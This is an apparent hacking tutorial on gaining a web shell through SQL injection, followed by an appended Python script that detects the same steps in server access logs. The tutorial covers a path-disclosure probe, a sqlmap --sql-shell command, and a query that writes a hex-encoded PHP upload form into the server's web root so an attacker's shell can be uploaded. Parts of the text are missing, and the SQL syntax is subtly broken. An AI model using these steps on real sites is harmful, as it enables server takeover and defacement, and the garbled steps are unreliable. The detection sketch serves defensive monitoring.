
Security: How Hackers Upload a Shell With SQL Injection


Hello, today I'm going to show you how to upload a shell simply using sqlmap!

So what do you need?


First of all, what is a shell?
A shell is a PHP/ASP script used to deface websites. Once you have uploaded your shell, you can easily control the hacked server by clicking some buttons or executing some commands (e.g. file manager, file upload, shell commands, database access...)!
Now let's start our tutorial:

After finding a vulnerable site, you need to get a full path disclosure.
If you can't find the full user path when adding ('), you can use the empty array exploit, so it will look like this:

http://www.example.com/exploit.php?id[]=1

It will give you an error like this:

Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59

Now all we need is the colored part (the user path on the server).
After getting the full path disclosure, we need to convert our PHP upload script to hex, so it will look like this:
Let's open sqlmap with the --sql-shell option:

python sqlmap.py --url=http://www.example.com/exploit.php?id=1 --sql-shell 

After waiting one or two minutes, sqlmap will give you a SQL shell. Now you can execute SQL queries, so you just need to execute this query:

select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";
After a few seconds, browse to "http://www.example.com/upload.php" and just upload your PHP shell!
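
Each step above leaves a trace in the web server's access log: the array-parameter probe, sqlmap's User-Agent, a long hex literal in a parameter, and a first-ever request for a script path from the same client. The following detection sketch is an added example, not code from the original post; the log lines, IP addresses, hex run, and the `analyze` helper are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample data (combined log format, documentation IP ranges).
HEX = "0x" + "41" * 24  # constructed 48-digit hex run, stands in for an encoded file body
SAMPLE_LOG = "\n".join([
    '198.51.100.4 - - [10/May/2024:09:58:11 +0000] "GET /index.php?id=7 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2024:10:01:02 +0000] "GET /exploit.php?id[]=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2024:10:03:40 +0000] "GET /exploit.php?id=1%27 HTTP/1.1" 200 498 "-" "sqlmap/1.x (constructed)"',
    f'203.0.113.7 - - [10/May/2024:10:05:12 +0000] "GET /exploit.php?id=1%20{HEX} HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2024:10:05:40 +0000] "GET /upload.php HTTP/1.1" 200 180 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2024:10:06:02 +0000] "POST /upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
])

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
SCRIPT_EXT = re.compile(r'\.(php|asp|aspx)$', re.I)
PROBES = {
    "array_param": re.compile(r'[?&][^=&]*\[\]='),       # id[]=1 path-disclosure probe
    "hex_literal": re.compile(r'0x[0-9a-f]{40,}', re.I),  # long hex string in a parameter
}

def analyze(log_text):
    """Return {client_ip: {"probes": set, "new_scripts": set}} for clients that probed."""
    seen_paths, findings = set(), {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, method, target, status, agent = m.groups()
        path, _, query = target.partition("?")
        decoded = "?" + unquote_plus(query)  # decode so id%5B%5D=1 is caught too
        hits = {name for name, rx in PROBES.items() if rx.search(decoded)}
        if "sqlmap" in agent.lower():  # default agent names the tool; weak signal, easily changed
            hits.add("sqlmap_agent")
        entry = findings.setdefault(ip, {"probes": set(), "new_scripts": set()})
        entry["probes"] |= hits
        # A script path never requested before, first served with 2xx to a client
        # that already probed, matches the dropped upload.php step.
        if (entry["probes"] and not hits and status.startswith("2")
                and SCRIPT_EXT.search(path) and path not in seen_paths):
            entry["new_scripts"].add(path)
        seen_paths.add(path)
    return {ip: e for ip, e in findings.items() if e["probes"]}

if __name__ == "__main__":
    for ip, e in analyze(SAMPLE_LOG).items():
        print(ip, sorted(e["probes"]), sorted(e["new_scripts"]))
```

The "new script" check only knows paths seen earlier in the same log, so feed it enough history (or a list of deployed files) to avoid flagging legitimate pages on their first hit.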